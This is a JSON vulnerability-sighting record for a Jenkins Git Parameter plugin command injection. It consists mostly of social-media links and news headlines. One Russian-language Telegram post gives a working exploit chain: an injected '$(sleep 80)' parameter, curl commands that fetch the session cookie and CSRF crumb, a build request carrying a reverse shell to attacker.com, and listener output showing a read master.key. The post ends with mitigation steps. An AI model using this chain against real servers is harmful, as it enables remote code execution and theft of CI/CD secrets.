{"vulnerability": "CVE-2025-53652", "sightings": [{"uuid": "d77b25c9-e68f-4c71-9f2b-e6955d19bcfe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "seen", "source": "https://infosec.exchange/users/obivan/statuses/115004896286350658", "content": "", "creation_timestamp": "2025-08-10T14:17:33.913045Z"}, {"uuid": "30d6c692-3ef6-4de9-85ee-3b11687c84db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "seen", "source": "https://bsky.app/profile/basefortify.bsky.social/post/3ltlvqiwjw22v", "content": "", "creation_timestamp": "2025-07-10T08:24:50.989514Z"}, {"uuid": "7f594aab-eca7-4724-b998-e253079de3ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "seen", "source": "https://bsky.app/profile/nimblenerd.social/post/3lvvy7t5y742m", "content": "", "creation_timestamp": "2025-08-08T19:26:07.822099Z"}, {"uuid": "10e46705-5b2f-429d-8575-ebb5a4a99226", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "seen", "source": "https://bsky.app/profile/hackread.bsky.social/post/3lvvym5e5fk26", "content": "", "creation_timestamp": "2025-08-08T19:33:01.612255Z"}, {"uuid": "20792305-fe12-46d0-a167-06d220cc5a53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-53652", "type": "seen", "source": "https://bsky.app/profile/jos1264.social.skynetcloud.site.ap.brid.gy/post/3lvwjrp7a6mu2", "content": "", "creation_timestamp": "2025-08-09T00:40:25.445656Z"}, {"uuid": "b2ab5002-86e4-4677-9179-1cf33799fe9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-53652", "type": "seen", "source": "https://bsky.app/profile/jos1264.social.skynetcloud.site.ap.brid.gy/post/3lvxev7kf3ir2", "content": "", "creation_timestamp": "2025-08-09T08:45:36.337075Z"}, {"uuid": "4c25623b-d35c-4994-a3b1-49478e4a2d7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-53652", "type": "seen", "source": "https://bsky.app/profile/cyberhub.blog/post/3lvyklwnvwj2y", "content": "", "creation_timestamp": "2025-08-09T20:00:20.396450Z"}, {"uuid": "833562ff-4e36-4303-bc3e-bdbd633d7cdf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3lvyxs6fy4s2b", "content": "", "creation_timestamp": "2025-08-09T23:56:27.985809Z"}, {"uuid": "3448135c-0512-4fb2-a62e-eeccf9420d72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3lvz52encus2d", "content": "", "creation_timestamp": "2025-08-10T01:30:32.270877Z"}, {"uuid": "a79b2604-bc66-4e1f-968f-45068d329527", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-53652", "type": "seen", "source": "https://infosec.exchange/users/patrickcmiller/statuses/115002987025479253", "content": "", "creation_timestamp": "2025-08-10T06:12:01.300479Z"}, {"uuid": "3664cc08-feb7-464d-86fe-7dae9efdf1db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "seen", "source": "https://bsky.app/profile/obivan.infosec.exchange.ap.brid.gy/post/3lw2hwezn2mp2", "content": "", "creation_timestamp": "2025-08-10T14:20:19.225064Z"}, {"uuid": "3e1a505e-5f22-4134-ba3d-40d683c30790", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "seen", "source": "https://bsky.app/profile/fraustief.bsky.social/post/3lwozypx4b22m", "content": "", "creation_timestamp": "2025-08-18T18:34:32.043198Z"}, {"uuid": "eb5c9c7b-8dda-47b6-aada-c2366c5e4bff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "seen", "source": "https://bsky.app/profile/davidi99.bsky.social/post/3lw4vz3dnwh2k", "content": "", "creation_timestamp": "2025-08-11T13:35:11.799722Z"}, {"uuid": "e83df90e-d0bd-477f-a0fe-b3195264362f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "seen", "source": "https://bsky.app/profile/patrickcmiller.bsky.social/post/3lw6by37lmc2w", "content": "", "creation_timestamp": "2025-08-12T02:42:06.690543Z"}, {"uuid": "d64a7ff0-4156-4d03-a307-9ea53e2ec2ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "seen", "source": "https://bsky.app/profile/fraustief.bsky.social/post/3lwozypxc4k2m", "content": "", "creation_timestamp": "2025-08-18T18:34:34.258905Z"}, {"uuid": "9ef12ed0-d127-4b13-90d1-1085224fdd4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "seen", "source": "https://bsky.app/profile/fraustief.bsky.social/post/3lwozypxd3s2m", "content": "", "creation_timestamp": "2025-08-18T18:34:36.397180Z"}, {"uuid": "df21e654-8641-401d-8796-7d6e605e975e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "seen", "source": "https://bsky.app/profile/fraustief.bsky.social/post/3lwozypxgys2m", "content": "", "creation_timestamp": "2025-08-18T18:34:38.593816Z"}, {"uuid": "269a1265-384e-49f8-92c1-c3dc7bc34b1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "seen", "source": "https://bsky.app/profile/fraustief.bsky.social/post/3lwozypxhy22m", "content": "", "creation_timestamp": "2025-08-18T18:34:40.760560Z"}, {"uuid": "2cb73c4a-f857-41d6-8c2b-06b8554c3306", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "seen", "source": "https://t.me/DarkWebInformer_News/7148", "content": "\ud83d\udea8 News Alert!\n\nSource: Hackread \u2013 Latest Cybersecurity, Hacking News, Tech, AI &amp; Crypto\nTitle: 15,000 Jenkins Servers at Risk from RCE Vulnerability (CVE-2025-53652)\nLink: https://hackread.com/jenkins-servers-risk-rce-vulnerability-cve-2025-53652/", "creation_timestamp": "2025-08-08T19:14:49.000000Z"}, {"uuid": "254fe96f-53c8-49c5-8f47-da3e42517ea5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "seen", "source": "https://t.me/MalaysiaHacktivistz/15310", "content": "15,000 Jenkins Servers at Risk from RCE Vulnerability (CVE-2025-53652) \u2013 hackread.com\n\nSat, 09 Aug 2025 03:14:36", "creation_timestamp": "2025-08-08T20:03:53.000000Z"}, {"uuid": "a10e13b5-6d93-4bd8-9957-099cc887e3a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/45328", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-53652: Jenkins Git Parameter Analysis\nURL\uff1ahttps://github.com/pl4tyz/CVE-2025-53652-Jenkins-Git-Parameter-Analysis\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-07-25T13:13:31.000000Z"}, {"uuid": "d53546c2-5efe-47fe-8aca-00240039505e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "seen", "source": "https://t.me/TengkorakCyberCrewzz/4423", "content": "15,000 Jenkins Servers at Risk from RCE Vulnerability (CVE-2025-53652) \u2013 hackread.com\n\nSat, 09 Aug 2025 03:14:36", "creation_timestamp": "2025-08-08T20:03:53.000000Z"}, {"uuid": "af5c8628-6294-4774-94ee-9a8ba1eb28a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "exploited", "source": "https://t.me/poxek/5569", "content": "CVE-2025-53652: Jenkins \u043f\u043e\u0434 \u0443\u0434\u0430\u0440\u043e\u043c \u0447\u0435\u0440\u0435\u0437 Git Parameter\n#jenkins #devops #dev #git\n\nCommand injection \u0432 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u043c Jenkins Git Parameter Plugin \u0441\u0442\u0430\u0432\u0438\u0442 \u043f\u043e\u0434 \u0443\u0433\u0440\u043e\u0437\u0443 DevOps \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u0442\u044b\u0441\u044f\u0447 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439. \u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u0443\u044e \u043e\u0446\u0435\u043d\u043a\u0443 \"Medium\", \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 VulnCheck \u0434\u043e\u043a\u0430\u0437\u0430\u043b\u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0438 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 CI/CD \u043f\u0430\u0439\u043f\u043b\u0430\u0439\u043d\u043e\u0432.\n\n\ud83e\udeb2\u0421\u0443\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\n\nGit Parameter Plugin \u043d\u0435 \u0432\u0430\u043b\u0438\u0434\u0438\u0440\u0443\u0435\u0442 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b, \u043f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0435\u043c\u044b\u0435 \u0432 build-\u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b. \u041f\u043b\u0430\u0433\u0438\u043d \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u0432\u043c\u0435\u0441\u0442\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0438\u044f \u043f\u0440\u0435\u0434\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u043c \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430\u043c, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u044e \u043a\u043e\u043c\u0430\u043d\u0434 \u0447\u0435\u0440\u0435\u0437 Git-\u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b.\n\n\u0417\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438: 439.vb_0e46ca_14534 \u0438 \u0440\u0430\u043d\u0435\u0435  \n\u0418\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043e \u0432: 444.vca_b_84d3703c2\n\n#\ufe0f\u20e3\u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u043c\u0435\u0445\u0430\u043d\u0438\u043a\u0430 \u0430\u0442\u0430\u043a\u0438\n\n\u27a1\ufe0f\u0426\u0435\u043f\u043e\u0447\u043a\u0430 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438\n\n# \u041d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u044b\u0439 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\nBRANCH_PARAM = \"master\"\n# \u0412\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f: git rev-parse --resolve-git-dir /path/master/.git\n\n# \u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\nBRANCH_PARAM = \"$(sleep 80)\"  \n# \u0412\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f: git rev-parse --resolve-git-dir /path/$(sleep 80)/.git\n# \u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442: \u043a\u043e\u043c\u0430\u043d\u0434\u0430 sleep \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u0434\u043e\u0447\u0435\u0440\u043d\u0438\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\n\n\u041f\u043b\u0430\u0433\u0438\u043d \u0432\u0441\u0442\u0440\u0430\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0439 \u0432\u0432\u043e\u0434 \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0432 shell-\u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0431\u0435\u0437 \u0432\u0430\u043b\u0438\u0434\u0430\u0446\u0438\u0438. Git \u043a\u0430\u043a GTFObin \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434, \u0434\u0435\u043b\u0430\u044f cmd injection \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u043e\u043f\u0430\u0441\u043d\u043e\u0439.\n\n\u27a1\ufe0f\u041f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\n\n# Reverse shell \u0447\u0435\u0440\u0435\u0437 curl\ncurl -kv 'http://jenkins:8080/job/buildName/build' -X POST \\\n  -H 'Cookie: [cookie]' \\\n  --data-urlencode 'Jenkins-Crumb=[crumb]' \\\n  --data-urlencode 'json={\"parameter\":{\"name\":\"BRANCH_PARAM\",\"value\":\"$(bash -c \\\"bash &amp;&gt; /dev/tcp/attacker.com/12700 &lt;&amp;1\\\")\"}}'\n\n\u2757\ufe0f\u041c\u0430\u0441\u0448\u0442\u0430\u0431 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b\n\nVulnCheck \u043f\u0440\u043e\u0432\u0435\u043b \u0430\u043d\u0430\u043b\u0438\u0437 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u044d\u043a\u0441\u043f\u043e\u0437\u0438\u0446\u0438\u0438 Jenkins:\n\n| \u041a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u044f              | \u041a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 | \u0420\u0438\u0441\u043a|\n|------------------------|---------------------|-------------|\n| \u0422\u0440\u0435\u0431\u0443\u044e\u0442 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 | 100,000+            | \u0421\u0440\u0435\u0434\u043d\u0438\u0439     |\n| \u041e\u0442\u043a\u0440\u044b\u0442\u0430\u044f \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u044f   | ~1,000              | \u0412\u044b\u0441\u043e\u043a\u0438\u0439     |\n| \u0411\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438     | ~15,000             | \u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 |\n\n15,000 Jenkins-\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 RCE \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u043c \"\u0438\u0437 \u043a\u043e\u0440\u043e\u0431\u043a\u0438\".\n\n\u2139\ufe0f\u0422\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u044f \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438\n\n\u27a1\ufe0f\u0410\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0430\u0442\u0430\u043a\u0438\n- \u041f\u0440\u0430\u0432\u0430 Item/Build \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u043c \u043f\u0440\u043e\u0435\u043a\u0442\u0435\n- \u0417\u043d\u0430\u043d\u0438\u0435 \u0438\u043c\u0435\u043d\u0438 build-\u0437\u0430\u0434\u0430\u0447\u0438\n- \u0412\u0430\u043b\u0438\u0434\u043d\u0430\u044f \u0441\u0435\u0441\u0441\u0438\u044f \u0438 CSRF-\u0442\u043e\u043a\u0435\u043d\n\n\u27a1\ufe0f\u041d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0430\u0442\u0430\u043a\u0438\n\u0414\u0430\u0436\u0435 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f:\n- \u0412\u0430\u043b\u0438\u0434\u043d\u044b\u0439 session cookie\n- Jenkins-Crumb (CSRF \u0442\u043e\u043a\u0435\u043d)  \n- \u0418\u043c\u044f build-\u0437\u0430\u0434\u0430\u0447\u0438\n\n# \u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445\ncurl -kv http://target:8080/ -o /dev/null  # \u041f\u043e\u043b\u0443\u0447\u0438\u0442\u044c cookie\ncurl -kv http://target:8080/job/buildName/build -H 'Cookie: [cookie]' | grep \"data-crumb-value=\"\n\n\u2757\ufe0f\u0420\u0435\u0430\u043b\u044c\u043d\u043e\u0435 \u0432\u043e\u0437\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0435\n\n\u27a1\ufe0f\u0412 \u0441\u043b\u0443\u0447\u0430\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0433\u043e \u043f\u043e\u0445\u0435\u043a\u0430\n# \u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438\n$ nc -lvnp 1270\nConnection received on 172.18.0.3 55664\n$ id\nuid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)\n\n$ cat ~/secrets/master.key\n05322ff531f1b52117bf013b2fe77b40dacbc56268d68b9e234216fe825a0073a5c8051181033f630e67c408d58c3ef631e18ba8b8e6722e64d3c1380518e89a91b4256c5c348febceb24ef32f144045ed422dfb4bdc840aca33814989e431aa00db6df7c403da38247324783811d46c6f3caa1f9b1b26d979fff4391249ca8a\n\n\u27a1\ufe0f\u041f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f\n- \u0414\u043e\u0441\u0442\u0443\u043f \u043a master.key \u2014 \u043f\u043e\u043b\u043d\u0430\u044f \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u044f Jenkins\n- \u0418\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434 \u043f\u0440\u043e\u0435\u043a\u0442\u043e\u0432 \u2014 \u0443\u0442\u0435\u0447\u043a\u0430 \u0438\u043d\u0442\u0435\u043b\u043b\u0435\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u0438  \n- \u0421\u0435\u043a\u0440\u0435\u0442\u044b CI/CD \u2014 credentials, API \u043a\u043b\u044e\u0447\u0438, \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u044b\n- Supply chain \u0430\u0442\u0430\u043a\u0438 \u2014 \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u0435 backdoor \u0432 \u0430\u0440\u0442\u0435\u0444\u0430\u043a\u0442\u044b\n- Lateral movement \u2014 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u043f\u043e \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435\n\n\u2757\ufe0f\u041c\u0438\u0442\u0438\u0433\u0430\u0446\u0438\u044f \u0438 \u0437\u0430\u0449\u0438\u0442\u0430\n\n\u27a1\ufe0f\u041d\u0435\u043c\u0435\u0434\u043b\u0435\u043d\u043d\u044b\u0435 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f\n1. \u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u043b\u0430\u0433\u0438\u043d\u0430 \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 444.vca_b_84d3703c2+\n2. \u041f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 bypass-\u0444\u043b\u0430\u0433\u0430 \u2014 \u0443\u0431\u0435\u0434\u0438\u0442\u044c\u0441\u044f, \u0447\u0442\u043e \u043d\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d:\n   \n   -Dnet.uaznia.lukanus.hudson.plugins.gitparameter.GitParameterDefinition.allowAnyParameterValue=true\n   \n3. \u0410\u0443\u0434\u0438\u0442 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u2014 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043d\u0435\u043d\u0443\u0436\u043d\u044b\u0435 \u043f\u043b\u0430\u0433\u0438\u043d\u044b\n\n\u27a1\ufe0f\u0414\u043e\u043b\u0433\u043e\u0441\u0440\u043e\u0447\u043d\u0430\u044f \u0441\u0442\u0440\u0430\u0442\u0435\u0433\u0438\u044f\n- \u041f\u0440\u0438\u043d\u0446\u0438\u043f \u043d\u0430\u0438\u043c\u0435\u043d\u044c\u0448\u0438\u0445 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0434\u043b\u044f build permissions\n- \u0421\u0435\u0442\u0435\u0432\u0430\u044f \u0441\u0435\u0433\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f Jenkins \u043e\u0442 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\n- \u041c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0447\u0435\u0440\u0435\u0437 SIEM/SOC\n- \u0420\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u044b\u0435 security assessments CI/CD \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b\n\n\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438:\n\ud83d\udd17 VulnCheck Analysis\n\ud83d\udd17 Jenkins Security Advisory\n\ud83d\udd17 CVE-2025-53652 NVD\n\n\ud83c\udf1a @poxek | MAX |\ud83c\udf1a \u0411\u043b\u043e\u0433 | \ud83d\udcfa YT | \ud83d\udcfa RT | \ud83d\udcfa VK | \u2764\ufe0f \u041c\u0435\u0440\u0447", "creation_timestamp": "2025-10-01T11:57:58.000000Z"}, {"uuid": "a9b8cf4b-339f-41d4-a77e-86272f27a7e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "seen", "source": "https://t.me/TengkorakCyberCrewzz/33654", "content": "15,000 Jenkins Servers at Risk from RCE Vulnerability (CVE-2025-53652) \u2013 hackread.com\n\nSat, 09 Aug 2025 03:14:36", "creation_timestamp": "2025-08-08T20:03:53.000000Z"}, {"uuid": "d179a061-38bf-4b39-a5c5-c75861362c3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-53652", "type": "published-proof-of-concept", "source": "Telegram/pWh9oXm1NWWZEdeLjOyDfp59yY5k-322VAVSQFlsbZDzP-c", "content": "", "creation_timestamp": "2025-07-25T21:00:04.000000Z"}]}